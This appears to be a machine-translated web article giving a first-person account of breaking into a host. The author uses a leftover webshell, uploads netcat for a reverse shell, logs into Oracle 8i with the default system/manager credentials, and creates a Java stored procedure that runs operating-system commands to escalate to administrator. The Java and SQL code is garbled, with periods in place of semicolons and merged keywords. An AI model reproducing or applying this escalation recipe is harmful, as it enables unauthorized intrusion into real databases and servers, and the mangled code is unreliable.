How to enhance permissions through the default oracle account

In oracle databases, access permissions can also be improved through the oracle default account. The following describes an example of permission escalation through the oracle default account, we hope that you will be enlightened on Database Security:

Recently, I visited a host. The configuration of the host is still safe, but the file. asp is left in a relatively hidden directory, and the webshell is easily obtained.

Then I went around on the host and took out superscan and swept it out. Only port 80 was opened. From the user \ Program directory, There is a shortcut: firecontrol, like a hardware firewall console. WEBSHELL under the detection of the open service, found that the general method of privilege can not be done, no SERV-U and so on, the host patch is also hit the latest. I tried to upload an NC and got a SHELL through the reverse connection, which is much more comfortable than in the veteran manager.

On disk C, you can see a directory named oracle and C: \ oracle \ ora81 \ network \ ADMIN \ tnsnames. the ora file confirms the host service name "xxx", reads the next version "oracle 8i", and uses the Database Connector Provider = MSDAORA.1.Password = manager. user ID = system. dataSource = xxxx tried the default system account and password manager, and the result is truly connected to the local oracle service.

Now, the default oracle account is like the sa in mssql. We can use this account to escalate permissions and immediately edit several scripts.

1.

 
 

  
  
sql create or replace and compilejava source named "Util"asimport java.io.*.  
  
  
import java.lang.*.   
  
  
public class Util extends Object{public static int RunThis(String args)  
  
  
{  
  
  
Runtime rt = Runtime.getRuntime().  
  
  
int rc = -1.   
  
  
try{Process p = rt.exec(args).  
  
  
int bufSize = 4096.  
  
  
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize).  
  
  
int len.byte buffer[] = new byte[bufSize].  
  
  
// Echo back what the program spit out  
  
  
while ((len = bis.read(buffer, 0, bufSize)) != -1)  
  
  
System.out.write(buffer, 0, len).   
  
  
rc = p.waitFor().  
  
  
}  
  
  
catch (Exception e)  
  
  
{  
  
  
e.printStackTrace().  
  
  
rc = -1.  
  
  
}  
  
  
finally{return rc.  
  
  
}  
  
  
}  
  
  
}  
  
  
 
 
 

2.

 
 

  
  
sql create or replacefunction RUN_CMD(p_cmd in varchar2)  
  
  
return numberaslanguage javaname Util.RunThis(java.lang.String)   
  
  
return integer. 
 
 

3.

 
 

  
  
sql create or replace procedure RC(p_cmd in varchar2)asx number.  
  
  
beginx := run_cmd(p_cmd).  
  
  
end. 
 
 

Save it in c: \, run sqlplus system/manager @ xxx with the reverse connection shell, and then run the script SQL> @ C: \ 1. sqlSQL> @ C: \ 2. sqlSQL> @ C: \ 3. SQL shows that JAVA has been created, the function has been created, and the process has been created. Then we continue SQL> variable x number. SQL> set serveroutput onSQL> exec dbms_java.set_output (100000 ). SQL> grant policyspriv to system.

Then we can execute the system command. I want to put ASP first. dll is added to a special SQL group> exec: x: = RUN_CMD (cscript adsutil. vbs set/W3SVC/InProcessIsapiApps "c: \ winnt \ system32 \ inetsrv \ asp. dll "). we can see that the process has been completed successfully. At this time, we re-log on to our webshell, which has the admin permission. Then, use NC to return a shell, which is already a management permission. We can do what we want. Because the host has a firewall to filter ports except port 80, it is difficult to create a graphical backdoor. Only a webshell with permissions is left. The permission has been raised.

Oracle data export and import Permissions

Differences between Oracle users and Models

View oracle user permissions

Introduction to oracle object permissions

Provides you with an in-depth understanding of oracle permission management